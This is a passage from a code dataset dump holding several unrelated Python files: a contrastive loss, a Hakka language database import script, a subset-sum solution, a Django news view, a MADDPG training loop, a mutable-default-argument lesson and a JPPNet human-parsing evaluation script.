= temperature\n# self.contrast_mode = contrast_mode\n# self.base_temperature = base_temperature\n\n# def forward(self, features, labels=None, mask=None):\n# \"\"\"Compute loss for model. If both `labels` and `mask` are None,\n# it degenerates to SimCLR unsupervised loss:\n# https://arxiv.org/pdf/2002.05709.pdf\n\n# Args:\n# features: hidden vector of shape [bsz, n_views, ...].\n# labels: ground truth of shape [bsz].\n# mask: contrastive mask of shape [bsz, bsz], mask_{i,j}=1 if sample j\n# has the same class as sample i. Can be asymmetric.\n# Returns:\n# A loss scalar.\n# \"\"\"\n# device = (torch.device('cuda')\n# if features.is_cuda\n# else torch.device('cpu'))\n# features = F.normalize(features, p=2, dim=2)\n\n# if len(features.shape) < 3:\n# raise ValueError('`features` needs to be [bsz, n_views, ...],'\n# 'at least 3 dimensions are required')\n# if len(features.shape) > 3:\n# features = features.view(features.shape[0], features.shape[1], -1)\n\n# batch_size = features.shape[0]\n# if labels is not None and mask is not None:\n# raise ValueError('Cannot define both `labels` and `mask`')\n# elif labels is None and mask is None:\n# mask = torch.eye(batch_size, dtype=torch.float32).to(device)\n# elif labels is not None:\n# labels = labels.contiguous().view(-1, 1)\n# if labels.shape[0] != batch_size:\n# raise ValueError('Num of labels does not match num of features')\n# mask = torch.eq(labels, labels.t()).float().to(device)\n# else:\n# mask = mask.float().to(device)\n\n# import pdb; pdb.set_trace()\n\n# contrast_count = features.shape[1]\n# contrast_feature = torch.cat(torch.unbind(features, dim=1), dim=0)\n# if self.contrast_mode == 'one':\n# anchor_feature = features[:, 0]\n# anchor_count = 1\n# elif self.contrast_mode == 'all':\n# anchor_feature = contrast_feature\n# anchor_count = contrast_count\n# else:\n# raise ValueError('Unknown mode: {}'.format(self.contrast_mode))\n \n \n# # compute logits\n# anchor_dot_contrast = torch.div(\n# torch.matmul(anchor_feature, contrast_feature.t()),\n# self.temperature)\n# # for numerical stability\n# logits_max, _ = torch.max(anchor_dot_contrast, dim=1, keepdim=True)\n# logits = anchor_dot_contrast - logits_max.detach()\n\n# # tile mask\n# mask = mask.repeat(anchor_count, contrast_count)\n# # mask-out self-contrast cases\n# logits_mask = torch.ones_like(mask).scatter(\n# 1,\n# torch.arange(batch_size * anchor_count).view(-1, 1).to(device),\n# 0\n# )\n# mask = mask * logits_mask\n\n# # compute log_prob\n# exp_logits = torch.exp(logits) * logits_mask\n# log_prob = logits - torch.log(exp_logits.sum(1, keepdim=True))\n\n# # compute mean of log-likelihood over positive\n# mean_log_prob_pos = (mask * log_prob).sum(1) / mask.sum(1)\n\n# # loss\n# loss = - (self.temperature / self.base_temperature) * mean_log_prob_pos\n# loss = loss.view(anchor_count, batch_size).mean()\n\n# return loss\n\n\n\n\n\n\n\n","sub_path":"contrastive_loss.py","file_name":"contrastive_loss.py","file_ext":"py","file_size_in_byte":9220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"96199337","text":"# -*- coding: utf-8 -*-\n\"\"\"\n著作權所有 (C) 民國102年 意傳文化科技\n開發者:薛丞宏\n網址:http://意傳.台灣\n語料來源:請看各資料庫內說明\n\n本程式乃自由軟體,您必須遵照SocialCalc設計的通用公共授權(Common Public Attribution License, CPAL)來修改和重新發佈這一程式,詳情請參閱條文。授權大略如下,若有歧異,以授權原文為主:\n\t1.得使用、修改、複製並發佈此程式碼,且必須以通用公共授權發行;\n\t2.任何以程式碼衍生的執行檔或網路服務,必須公開該程式碼;\n\t3.將此程式的原始碼當函式庫引用入商業軟體,且不需公開非關此函式庫的任何程式碼\n\n此開放原始碼、共享軟體或說明文件之使用或散佈不負擔保責任,並拒絕負擔因使用上述軟體或說明文件所致任何及一切賠償責任或損害。\n\n臺灣言語工具緣起於本土文化推廣與傳承,非常歡迎各界用於商業軟體,但希望在使用之餘,能夠提供建議、錯誤回報或修補,回饋給這塊土地。\n\n感謝您的使用與推廣~~勞力!承蒙!\n\"\"\"\nfrom 臺灣言語工具.資料庫.資料庫連線 import 資料庫連線\nfrom 臺灣言語工具.解析整理.拆文分析器 import 拆文分析器\nfrom 臺灣言語工具.解析整理.物件譀鏡 import 物件譀鏡\nfrom 臺灣言語工具.資料庫.欄位資訊 import 版本正常\nfrom 臺灣言語工具.資料庫.欄位資訊 import 字詞\nfrom 臺灣言語工具.資料庫.整合.整合入言語 import 加文字佮版本\nfrom 臺灣言語工具.資料庫.欄位資訊 import 客語\nfrom 臺灣言語工具.資料庫.欄位資訊 import 國語臺員腔\nfrom 臺灣言語工具.資料庫.整合.整合入言語 import 加關係\nfrom 臺灣言語工具.資料庫.欄位資訊 import 義近\nfrom 臺灣言語工具.資料庫.欄位資訊 import 會當替換\nfrom 臺灣言語工具.基本元素.公用變數 import 標點符號\nfrom 臺灣言語工具.音標系統.客話.臺灣客家話拼音 import 臺灣客家話拼音調類對照表\nfrom 臺灣言語工具.解析整理.文章粗胚 import 文章粗胚\nfrom 臺灣言語工具.解析整理.轉物件音家私 import 轉物件音家私\nfrom 臺灣言語工具.音標系統.客話.臺灣客家話拼音 import 臺灣客家話拼音\n\n客委會能力名 = '客委會能力認證'\n客委會能力地區 = '臺員'\n客委會能力年代 = 100\n\n# 揣全部資料 = 資料庫連線.prepare('SELECT \"編號\",\"客語詞\",\"腔\",\"音標\",\"國語詞\",\"英文詞\",\"客句\",\"國句\" FROM \"客語能力認證資訊區\".\"網頁資料\" WHERE \"編號\"= 107707 ORDER BY \"編號\"')\n揣全部資料 = 資料庫連線.prepare('SELECT \"編號\",\"客語詞\",\"腔\",\"音標\",\"國語詞\",\"英文詞\",\"客句\",\"國句\" FROM \"客語能力認證資訊區\".\"網頁資料\" ORDER BY \"編號\"')\n\nclass 整合客話能力():\n\tdef __init__(self):\n\t\t粗胚 = 文章粗胚()\n\t\t分析器 = 拆文分析器()\n\t\t全部資料 = 揣全部資料()\n\t\t家私 = 轉物件音家私()\n\t\t譀鏡 = 物件譀鏡()\n\n\t\tfor 編號, 客語詞, 腔, 音標, 國語詞, 英文詞, 客句, 國句 in 全部資料:\n\t\t\tprint(編號, 客語詞, 腔, 音標)\n\t\t\t腔 = 客語 + 腔 + '腔'\n\t\t\t種類 = 字詞\n\t\t\t流水號集 = []\n\t\t\tfor 標點 in 標點符號:\n\t\t\t\t國語詞 = 國語詞.replace(標點, ' ')\n\t\t\tfor 數字 in range(10):\n\t\t\t\t國語詞 = 國語詞.replace(str(數字), ' ')\n\t\t\tfor 詞 in 國語詞.split():\n\t\t\t\tprint(詞)\n\t\t\t\t流水號 = 加文字佮版本(客委會能力名, 種類, 國語臺員腔, 客委會能力地區,\n\t\t\t\t\t客委會能力年代, 詞, '', 版本正常)\n\t\t\t\t流水號集.append(流水號)\n\n\t\t\tfor 調 in 臺灣客家話拼音調類對照表 - {''}:\n\t\t\t\t音標 = 音標.replace(調, 調 + ' ')\n\t\t\t音標 = 音標.replace('】', ' ')\n\t\t\tfor 逐个音 in 音標.split('【'):\n\t\t\t\ttry:\n\t\t\t\t\t客語詞 = 客語詞.replace('(', ' ( ').replace(')', ')').replace('(', ' ( ')\n\t\t\t\t\t逐个音 = 逐个音.replace('(', ' ( ').replace(')', ')').replace('(', ' ( ')\n\t\t\t\t\tprint(客語詞, 逐个音)\n\t\t\t\t\t句物件 = 分析器.產生對齊組(客語詞, 逐个音)\n\t\t\t\t\t新客語詞 = 客語詞.replace(')', ' ')\n\t\t\t\t\t新音標 = 逐个音.replace(')', ' ')\n\t\t\t\t\tif '(' in 新客語詞 and '(' in 新音標:\n\t\t\t\t\t\t詞集 = 新客語詞.split('(')\n\t\t\t\t\t\t音集 = 新音標.split('(')\n\t\t\t\t\telse:\n\t\t\t\t\t\t詞集 = [新客語詞]\n\t\t\t\t\t\t音集 = [新音標]\n\t\t\t\t\tfor 詞, 音 in zip(詞集, 音集):\n\t\t\t\t\t\t音 = 粗胚.除掉重覆的空白(音).strip()\n\t\t\t\t\t\tprint(詞, 音)\n\t\t\t\t\t\t音 = 音.replace(' ', '-')\n\t\t\t\t\t\t新句物件 = 分析器.產生對齊組(詞, 音)\n\t\t\t\t\t\t標準句物件 = 家私.轉做標準音標(臺灣客家話拼音, 新句物件)\n\t\t\t\t\t\tprint(客委會能力名, 種類, 腔, 客委會能力地區,\n \t\t\t\t\t\t\t\t\t客委會能力年代, 譀鏡.看型(標準句物件), 譀鏡.看音(標準句物件), 版本正常)\n\t\t\t\t\t\t流水號 = 加文字佮版本(客委會能力名, 種類, 腔, 客委會能力地區,\n \t\t\t\t\t\t\t\t\t客委會能力年代, 譀鏡.看型(標準句物件), 譀鏡.看音(標準句物件), 版本正常)\n\t\t\t\t\t\tfor 進前流水號 in 流水號集:\n\t\t\t\t\t\t\t加關係(進前流水號, 流水號, 義近, 會當替換)\n\t\t\t\t\t\t\t加關係(流水號, 進前流水號, 義近, 會當替換)\n\t\t\t\t\t\t流水號集.append(流水號)\n\t\t\t\texcept Exception as 錯誤:\n\t\t\t\t\tprint('錯誤!! {0},{1},{2},{3},{4}'.\n\t\t\t\t\t\tformat(編號, 客語詞, 音標, type(錯誤), 錯誤))\n\n\n\n\nif __name__ == '__main__':\n\t整合客話能力()\n","sub_path":"舊臺灣言語工具/資料佮語料匯入整合/客語能力認證資訊區/整合客語能力.py","file_name":"整合客語能力.py","file_ext":"py","file_size_in_byte":5534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"626839711","text":"def payup(set, n, sum):\n if sum == 0:\n return True\n if n == 0 and sum != 0:\n return False\n\n if set[n-1] > sum:\n return payup(set, n-1, sum)\n\n return payup(set, n-1, sum) or payup(set, n-1, sum-set[n-1])\n\n\nfor t in range(int(input())):\n n, m = map(int, input().split())\n notes = []\n for i in range(n):\n notes.append(int(input()))\n if(payup(notes, n, m)):\n print(\"Yes\")\n else:\n print(\"No\")\n","sub_path":"data/CodeChef/MARCHA1.py","file_name":"MARCHA1.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"563817708","text":"from django.shortcuts import render\nfrom .models import Tweet, Reddit, Iconist, Medium, YouTube, Rhizome, ICYMI\nimport datetime\nfrom datetime import timedelta\n\n#from news.cron import news_cron_15m, news_cron_6h\n\nfrom itertools import chain\nfrom operator import attrgetter\n\n\ndef init_mode(request):\n if 'nightmode' not in request.session:\n request.session['nightmode'] = True\n if 'navbar' not in request.session:\n request.session['navbar'] = True\n if 'fromAddress' not in request.session:\n request.session['fromAddress'] = 'none'\n\n context = {\n 'nightmode': request.session['nightmode'],\n 'navbar': request.session['navbar'],\n 'fromAddress': request.session['fromAddress'],\n 'section': 'NEWS',\n }\n return context\n\n\ndef news(request, template='news/news.html', extra_context=None):\n context = init_mode(request)\n\n today = datetime.datetime.now()\n long_ago = today + timedelta(days=-30)\n\n #news_cron_15m()\n #news_cron_6h()\n #latest_tweets()\n #latest_reddits()\n #latest_iconists()\n #latest_mediums()\n #latest_youtubes()\n #latest_rhizomes()\n\n icymi_entries = ICYMI.objects.filter(create_day__gte=long_ago).order_by('-create_day') #ICYMI.objects.all().order_by('-create_day')[:5]\n twitter_entries = Tweet.objects.all()\n reddit_entries = Reddit.objects.all()\n youtube_entries = YouTube.objects.filter(created_at__gte=long_ago)\n medium_entries = Medium.objects.filter(created_at__gte=long_ago)\n iconist_entries = Iconist.objects.filter(created_at__gte=long_ago)\n rhizome_entries = Rhizome.objects.filter(created_at__gte=long_ago)\n\n all_entries = list(chain(twitter_entries, reddit_entries, medium_entries, iconist_entries, rhizome_entries))\n all_entries = sorted(all_entries, key=attrgetter('created_at'), reverse=True)\n\n context.update({\n 'subsection': 'NEWS',\n 'icymi_entries': icymi_entries,\n 'all_entries': all_entries,\n 'twitter_entries': twitter_entries,\n 'reddit_entries': reddit_entries,\n 'youtube_entries': youtube_entries,\n 'medium_entries': medium_entries,\n 'iconist_entries': iconist_entries,\n 'rhizome_entries': rhizome_entries,\n })\n\n if extra_context is not None:\n context.update(extra_context)\n return render(request, template, context)\n\n","sub_path":"news/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"271761414","text":"\nfrom unityagents import UnityEnvironment\nimport numpy as np\nfrom agent import MultiAgentDeepDeterministicPolicyGradient\nimport torch\n\n\nimport time\nfrom collections import deque\nimport numpy as np\nfrom tensorboardX import SummaryWriter\n\n\n# Reference/Credit Stats class & reporting mechanisms: danielnbarbosa/drlnd_collaboration_and_competition \nclass Stats():\n def __init__(self):\n self.score = None\n self.avg_score = None\n self.std_dev = None\n self.scores = [] # list containing scores from each episode\n self.avg_scores = [] # list containing average scores after each episode\n self.scores_window = deque(maxlen=100) # last 100 scores\n self.best_avg_score = -np.Inf # best score for a single episode\n self.time_start = time.time() # track cumulative wall time\n self.total_steps = 0 # track cumulative steps taken\n self.writer = SummaryWriter()\n\n def update(self, steps, rewards, i_episode):\n \"\"\"Update stats after each episode.\"\"\"\n self.total_steps += steps\n self.score = sum(rewards)\n self.scores_window.append(self.score)\n self.scores.append(self.score)\n self.avg_score = np.mean(self.scores_window)\n self.avg_scores.append(self.avg_score)\n self.std_dev = np.std(self.scores_window)\n # update best average score\n if self.avg_score > self.best_avg_score and i_episode > 100:\n self.best_avg_score = self.avg_score\n\n def is_solved(self, i_episode, solve_score):\n \"\"\"Define solve criteria.\"\"\"\n return self.avg_score >= solve_score and i_episode >= 100\n\n def print_episode(self, i_episode, steps, stats_format, buffer_len, noise_weight,\n critic_loss_01, critic_loss_02,\n actor_loss_01, actor_loss_02,\n noise_val_01, noise_val_02,\n rewards_01, rewards_02):\n common_stats = 'Episode: {:5} Avg: {:8.3f} BestAvg: {:8.3f} σ: {:8.3f} | Steps: {:8} Reward: {:8.3f} | '.format(i_episode, self.avg_score, self.best_avg_score, self.std_dev, steps, self.score)\n print('\\r' + common_stats + stats_format.format(buffer_len, noise_weight), end=\"\")\n # log lots of stuff to tensorboard\n self.writer.add_scalar('global/reward', self.score, i_episode)\n self.writer.add_scalar('global/std_dev', self.std_dev, i_episode)\n self.writer.add_scalar('global/avg_reward', self.avg_score, i_episode)\n self.writer.add_scalar('global/buffer_len', buffer_len, i_episode)\n self.writer.add_scalar('global/noise_weight', noise_weight, i_episode)\n self.writer.add_scalar('agent_01/critic_loss', critic_loss_01, i_episode)\n self.writer.add_scalar('agent_02/critic_loss', critic_loss_02, i_episode)\n self.writer.add_scalar('agent_01/actor_loss', actor_loss_01, i_episode)\n self.writer.add_scalar('agent_02/actor_loss', actor_loss_02, i_episode)\n self.writer.add_scalar('agent_01/noise_val_01', noise_val_01[0], i_episode)\n self.writer.add_scalar('agent_01/noise_val_02', noise_val_01[1], i_episode)\n self.writer.add_scalar('agent_02/noise_val_01', noise_val_02[0], i_episode)\n self.writer.add_scalar('agent_02/noise_val_02', noise_val_02[1], i_episode)\n self.writer.add_scalar('agent_01/reward', rewards_01, i_episode)\n self.writer.add_scalar('agent_02/reward', rewards_02, i_episode)\n\n def print_epoch(self, i_episode, stats_format, *args):\n n_secs = int(time.time() - self.time_start)\n common_stats = 'Episode: {:5} Avg: {:8.3f} BestAvg: {:8.3f} σ: {:8.3f} | Steps: {:8} Secs: {:6} | '.format(i_episode, self.avg_score, self.best_avg_score, self.std_dev, self.total_steps, n_secs)\n print('\\r' + common_stats + stats_format.format(*args))\n\n def print_solve(self, i_episode, stats_format, *args):\n self.print_epoch(i_episode, stats_format, *args)\n print('\\nSolved in {:d} episodes!'.format(i_episode-100))\n\nclass general_environment_solver():\n \"\"\" General Solver for Unity Environments \"\"\"\n def __init__(self, unity_env='Tennis_Linux/Tennis.x86_64'):\n \n \"\"\"Initialize a general environment solver. Run refresh_env to reset the solver.\n You can run the solver using the defaults.\n \n Params\n ======\n unity_env (string): path to unity environment\n \"\"\"\n self.env = UnityEnvironment(file_name=unity_env)\n self.train_mode = True\n \n def ready_agents(self, display_info=True, train_mode=True):\n # get the default brain\n self.brain_name = self.env.brain_names[0]\n brain = self.env.brains[self.brain_name]\n \n if display_info==True:\n print(\"Brain name \" + self.brain_name)\n \n # refresh the environment\n self.env_info = self.env.reset(train_mode=self.train_mode)[self.brain_name]\n \n self.agent = MultiAgentDeepDeterministicPolicyGradient()\n \n def run_maddpg(self, n_episodes=10000000, max_timesteps=1000, min_solve_threshold=0.50, scores_window_length=100):\n # train the agent\n\n \"\"\" MultiAgent Deep Deterministic Policy Gradients\n \n Params\n ======\n num_episodes (int): maximum number of training episodes\n max_t (int): maximum number of timesteps per episode\n min_solve_threshold (float): a score metric that result in training to stop\n scores_window_length (int): maximum length of scoring metric window, e.g. last 100 scores\n \"\"\"\n \n # list containing scores from each episode\n stats = Stats()\n stats_format = 'Buffer: {:6} NoiseW: {:.4}'\n\n for i_episode in range(1, n_episodes+1):\n rewards = []\n env_info = self.env.reset(train_mode=self.train_mode)[self.brain_name]\n state = env_info.vector_observations\n\n # loop over steps\n for t in range(max_timesteps):\n # select an action\n if self.agent.evaluation_only: # disable noise on evaluation\n action = self.agent.act(state, add_noise=False)\n else:\n action = self.agent.act(state)\n\n # take action in environment\n self.env_info = self.env.step(action)[self.brain_name]\n next_state = self.env_info.vector_observations\n reward = self.env_info.rewards\n done = self.env_info.local_done\n\n # update agent with returned information\n self.agent.step(state, action, reward, next_state, done)\n state = next_state\n rewards.append(reward)\n if any(done):\n break\n\n # every episode\n buffer_len = len(self.agent.memory)\n per_agent_rewards = [] # calculate per agent rewards\n for i in range(self.agent.num_agents):\n per_agent_reward = 0\n for step in rewards:\n per_agent_reward += step[i]\n per_agent_rewards.append(per_agent_reward)\n stats.update(t, [np.max(per_agent_rewards)], i_episode) # use max over all agents as episode reward\n stats.print_episode(i_episode, t, stats_format, buffer_len, self.agent.noise_weight,\n self.agent.agents[0].critic_loss, self.agent.agents[1].critic_loss,\n self.agent.agents[0].actor_loss, self.agent.agents[1].actor_loss,\n self.agent.agents[0].noise_val, self.agent.agents[1].noise_val,\n per_agent_rewards[0], per_agent_rewards[1])\n\n # every epoch (100 episodes)\n if i_episode % 100 == 0:\n #stats.print_epoch(i_episode, stats_format, buffer_len, agent.noise_weight)\n save_name = 'saves/episode.{}.'.format(i_episode)\n for i, save_agent in enumerate(self.agent.agents):\n torch.save(save_agent.actor_local.state_dict(), save_name + str(i) + '.actor.pth')\n torch.save(save_agent.critic_local.state_dict(), save_name + str(i) + '.critic.pth')\n\n # if solved\n if stats.is_solved(i_episode, min_solve_threshold):\n stats.print_solve(i_episode, stats_format, buffer_len, self.agent.noise_weight)\n save_name = 'saves/solved.'\n for i, save_agent in enumerate(self.agent.agents):\n torch.save(save_agent.actor_local.state_dict(), save_name + str(i) + '.actor.pth')\n torch.save(save_agent.critic_local.state_dict(), save_name + str(i) + '.critic.pth')\n break\n\n\n","sub_path":"p3_collab-compet/GES.py","file_name":"GES.py","file_ext":"py","file_size_in_byte":8915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"56855546","text":"def bad_func(a, b=[]):\n b.append(a)\n return b\n# \n# ## Как правильно работать со списком в\n# ## качестве аргумента функции\ndef good_func(a, b=None):\n if b is None:\n b = []\n b.append(a)\n return b\n# \nlst = [4, 5, 8]\nres_1 = bad_func(111, lst)\nprint(res_1)\nres_2 = bad_func(222, res_1)\nprint(res_2)\n\nres_3 = bad_func(333)\nprint(res_3)\n\n# res_4 = bad_func(444, ['hello', 'hi'])\n# print(res_4)\n\nprint('Неправильная работа функции')\nres_5 = bad_func(555)\nprint(f'{res_5}')\nres_6 = bad_func(666)\nprint(f'{res_6}')\n# \nprint('Правильная работа функции')\ngood_res_3 = good_func(333)\nprint(good_res_3)\ngood_res_4 = good_func(444)\nprint(good_res_4)\ngood_res_5 = good_func(555)\nprint(good_res_5)\n# \ngood_res_6 = good_func(111, lst)\nprint(good_res_6)\n\n\n\n","sub_path":"Python 1/Day 8/Examples/funcs_and_list.py","file_name":"funcs_and_list.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"112063106","text":"from tqdm import tqdm\nimport argparse\nfrom datetime import datetime\n\n# for debugging\nimport code\n\n\nimport os\nimport sys\nimport time\nimport scipy.misc\nfrom scipy import sparse\nimport cv2\nfrom PIL import Image\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\n\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom utils import *\nfrom LIP_model import *\nimport argparse\n\nN_CLASSES = 20\n# DATA_DIRECTORY = './datasets/examples'\n# DATA_LIST_PATH = './datasets/examples/list/val.txt'\nDATA_DIRECTORY = './datasets/outfit-transfer'\nDATA_LIST_PATH = './datasets/outfit-transfer/tina_list.txt'\nRESTORE_FROM = './checkpoint/JPPNet-s2'\nOUTPUT_DIR = './output/parsing/val'\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Evaluate parsing\")\n parser.add_argument(\"-d\", \"--data_directory\", help=\"Directory containing images.\", default=DATA_DIRECTORY)\n parser.add_argument(\"-l\", \"--data_list\", help=\".txt file containing list of images to evaluate.\", default=DATA_LIST_PATH)\n parser.add_argument(\"-o\", \"--output_directory\", help=\"Directory containing images.\", default=OUTPUT_DIR)\n parser.add_argument(\"-a\", \"--all_steps\", action=\"store_true\", help=\"Run all images instead of number of steps\")\n parser.add_argument(\"-s\", \"--steps\", type=int, help=\"Number of steps to run, instead of the whole directory\")\n parser.add_argument(\"--size\", type=int, help=\"Input size\")\n parser.add_argument(\"-v\", \"--visualize_step\", type=int, help=\"How often to visualize\")\n\n args = parser.parse_args()\n\n\n\n \"\"\"Create the model and start the evaluation process.\"\"\"\n\n # Create queue coordinator.\n coord = tf.train.Coordinator()\n INPUT_SIZE = (args.size, args.size)\n h, w = INPUT_SIZE\n # Load reader.\n with tf.name_scope(\"create_inputs\"):\n reader = ImageReader(args.data_directory, args.data_list, None, False, False, coord)\n image = reader.image\n image_rev = tf.reverse(image, tf.stack([1]))\n image_list = reader.image_list\n\n image_batch_origin = tf.stack([image, image_rev])\n image_batch = tf.image.resize_images(image_batch_origin, [int(h), int(w)])\n image_batch075 = tf.image.resize_images(image_batch_origin, [int(h * 0.75), int(w * 0.75)])\n image_batch125 = tf.image.resize_images(image_batch_origin, [int(h * 1.25), int(w * 1.25)])\n\n # Create network.\n with tf.variable_scope('', reuse=False):\n net_100 = JPPNetModel({'data': image_batch}, is_training=False, n_classes=N_CLASSES)\n with tf.variable_scope('', reuse=True):\n net_075 = JPPNetModel({'data': image_batch075}, is_training=False, n_classes=N_CLASSES)\n with tf.variable_scope('', reuse=True):\n net_125 = JPPNetModel({'data': image_batch125}, is_training=False, n_classes=N_CLASSES)\n\n\n # parsing net\n parsing_fea1_100 = net_100.layers['res5d_branch2b_parsing']\n parsing_fea1_075 = net_075.layers['res5d_branch2b_parsing']\n parsing_fea1_125 = net_125.layers['res5d_branch2b_parsing']\n\n parsing_out1_100 = net_100.layers['fc1_human']\n parsing_out1_075 = net_075.layers['fc1_human']\n parsing_out1_125 = net_125.layers['fc1_human']\n\n # pose net\n resnet_fea_100 = net_100.layers['res4b22_relu']\n resnet_fea_075 = net_075.layers['res4b22_relu']\n resnet_fea_125 = net_125.layers['res4b22_relu']\n\n with tf.variable_scope('', reuse=False):\n pose_out1_100, pose_fea1_100 = pose_net(resnet_fea_100, 'fc1_pose')\n pose_out2_100, pose_fea2_100 = pose_refine(pose_out1_100, parsing_out1_100, pose_fea1_100, name='fc2_pose')\n parsing_out2_100, parsing_fea2_100 = parsing_refine(parsing_out1_100, pose_out1_100, parsing_fea1_100, name='fc2_parsing')\n parsing_out3_100, parsing_fea3_100 = parsing_refine(parsing_out2_100, pose_out2_100, parsing_fea2_100, name='fc3_parsing')\n\n with tf.variable_scope('', reuse=True):\n pose_out1_075, pose_fea1_075 = pose_net(resnet_fea_075, 'fc1_pose')\n pose_out2_075, pose_fea2_075 = pose_refine(pose_out1_075, parsing_out1_075, pose_fea1_075, name='fc2_pose')\n parsing_out2_075, parsing_fea2_075 = parsing_refine(parsing_out1_075, pose_out1_075, parsing_fea1_075, name='fc2_parsing')\n parsing_out3_075, parsing_fea3_075 = parsing_refine(parsing_out2_075, pose_out2_075, parsing_fea2_075, name='fc3_parsing')\n\n with tf.variable_scope('', reuse=True):\n pose_out1_125, pose_fea1_125 = pose_net(resnet_fea_125, 'fc1_pose')\n pose_out2_125, pose_fea2_125 = pose_refine(pose_out1_125, parsing_out1_125, pose_fea1_125, name='fc2_pose')\n parsing_out2_125, parsing_fea2_125 = parsing_refine(parsing_out1_125, pose_out1_125, parsing_fea1_125, name='fc2_parsing')\n parsing_out3_125, parsing_fea3_125 = parsing_refine(parsing_out2_125, pose_out2_125, parsing_fea2_125, name='fc3_parsing')\n\n\n parsing_out1 = tf.reduce_mean(tf.stack([tf.image.resize_images(parsing_out1_100, tf.shape(image_batch_origin)[1:3,]),\n tf.image.resize_images(parsing_out1_075, tf.shape(image_batch_origin)[1:3,]),\n tf.image.resize_images(parsing_out1_125, tf.shape(image_batch_origin)[1:3,])]), axis=0)\n parsing_out2 = tf.reduce_mean(tf.stack([tf.image.resize_images(parsing_out2_100, tf.shape(image_batch_origin)[1:3,]),\n tf.image.resize_images(parsing_out2_075, tf.shape(image_batch_origin)[1:3,]),\n tf.image.resize_images(parsing_out2_125, tf.shape(image_batch_origin)[1:3,])]), axis=0)\n parsing_out3 = tf.reduce_mean(tf.stack([tf.image.resize_images(parsing_out3_100, tf.shape(image_batch_origin)[1:3,]),\n tf.image.resize_images(parsing_out3_075, tf.shape(image_batch_origin)[1:3,]),\n tf.image.resize_images(parsing_out3_125, tf.shape(image_batch_origin)[1:3,])]), axis=0)\n\n raw_output = tf.reduce_mean(tf.stack([parsing_out1, parsing_out2, parsing_out3]), axis=0)\n head_output, tail_output = tf.unstack(raw_output, num=2, axis=0)\n tail_list = tf.unstack(tail_output, num=20, axis=2)\n tail_list_rev = [None] * 20\n for xx in range(14):\n tail_list_rev[xx] = tail_list[xx]\n tail_list_rev[14] = tail_list[15]\n tail_list_rev[15] = tail_list[14]\n tail_list_rev[16] = tail_list[17]\n tail_list_rev[17] = tail_list[16]\n tail_list_rev[18] = tail_list[19]\n tail_list_rev[19] = tail_list[18]\n tail_output_rev = tf.stack(tail_list_rev, axis=2)\n tail_output_rev = tf.reverse(tail_output_rev, tf.stack([1]))\n\n\n raw_output_all = tf.reduce_mean(tf.stack([head_output, tail_output_rev]), axis=0)\n # expand_dims to the beginning for the \"batch\" dimension\n before_argmax = tf.expand_dims(raw_output_all, dim=0)\n before_glasses = tf.slice(before_argmax, [0,0,0,0], [-1, -1, -1, 4])\n after_glasses = tf.slice(before_argmax, [0,0,0,5], [-1, -1, -1, -1])\n # this is now a 19-channel tensor\n without_glasses = tf.concat((before_glasses, after_glasses), axis=3)\n\n # # take out the background channel\n # seg_18 = before_argmax[:, :, :, 1:]\n # # convert to probability maps\n # seg_18_pmap = tf.nn.softmax(seg_18, axis=3)\n # # keep only the top 3 pmaps, because assume don't need more boundaries than the top 3\n # seg_18_pmap_thin =\n\n\n # AJ: take the argmax of the channel dimension, to determine which clothing\n # label has the highest probabilitye\n argmaxed = tf.argmax(without_glasses, dimension=3)\n # argmax removed dim3, so add it back. Creates a 4d tensor, to make it batch x height x width x color\n pred_all = tf.expand_dims(argmaxed, dim=3)\n\n # Which variables to load.\n restore_var = tf.global_variables()\n # Set up tf session and initialize variables.\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n sess = tf.Session(config=config)\n init = tf.global_variables_initializer()\n\n sess.run(init)\n sess.run(tf.local_variables_initializer())\n\n # Load weights.\n loader = tf.train.Saver(var_list=restore_var)\n if RESTORE_FROM is not None:\n if load(loader, sess, RESTORE_FROM):\n print(\" [*] Load SUCCESS\")\n else:\n print(\" [!] Load failed...\")\n\n # Start queue threads.\n threads = tf.train.start_queue_runners(coord=coord, sess=sess)\n\n\n # Iterate over training steps.\n num_steps = args.steps if args.steps else len(image_list) # added by AJ\n t = tqdm(range(num_steps), unit=\"img\")\n for step in t:\n # removes the extension type\n img_id = os.path.splitext(image_list[step])[0]\n img_subpath = get_path_after_texture(img_id)\n\n # make output directory\n os.makedirs(os.path.join(args.output_directory, os.path.dirname(img_subpath)), exist_ok=True)\n\n t.set_description(img_subpath)\n\n # compute the output\n out = sess.run(pred_all)\n # create sparse matrix\n out_sparse = sparse.csc_matrix(np.squeeze(out))\n\n # seg_pmap = sess.run(seg_18_prob_map)\n # seg_pmap[seg_pmap < 0.05] = 0\n\n # save the numpy-array probability map to a file, so we can use it later\n fname = os.path.join(args.output_directory, img_subpath)\n sparse.save_npz(fname, out_sparse)\n # np.save(fname, out)\n\n if args.visualize_step and step % args.visualize_step == 0:\n msk = decode_labels(out)\n parsing_im = Image.fromarray(msk[0])\n parsing_im.save(f'{args.output_directory}/{img_subpath}_vis.png')\n\n coord.request_stop()\n coord.join(threads)\n\ndef get_path_after_texture(img_id):\n sep = os.path.sep\n path_elements = img_id.split(sep)\n tex_ind = path_elements.index(\"texture\")\n path = sep.join(path_elements[tex_ind + 1:])\n return path\n\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"evaluate_parsing_JPPNet-s2.py","file_name":"evaluate_parsing_JPPNet-s2.py","file_ext":"py","file_size_in_byte":9830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"86278408","text":"import NeatMS as ntms\n\nbase_path = './data/metaclean_testdata2/'\nraw_data_folder_path = base_path + 'mzML/'\n# Using peaks that have been aligned across 